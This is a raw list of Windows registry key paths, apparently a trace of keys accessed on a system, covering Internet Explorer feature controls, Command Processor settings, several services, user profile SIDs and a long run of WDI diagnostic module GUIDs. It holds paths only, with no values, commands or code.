HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\wlanext.exe HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\* HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun HKEY_CURRENT_USER\Software\Microsoft\Command Processor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir HKEY_USERS\S-1-5-18 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\.DEFAULT\Environment HKEY_USERS\.DEFAULT\Volatile Environment HKEY_USERS\.DEFAULT\Volatile Environment\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Environment HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\RequiredPrivileges HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST HKEY_USERS\S-1-5-19 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\ProfileImagePath HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\S-1-5-19\Environment HKEY_USERS\S-1-5-19\Volatile Environment HKEY_USERS\S-1-5-19\Volatile Environment\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Environment HKEY_CURRENT_USER\Software\Classes\AppID\taskhost.exe HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\DiagnosticModules HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority 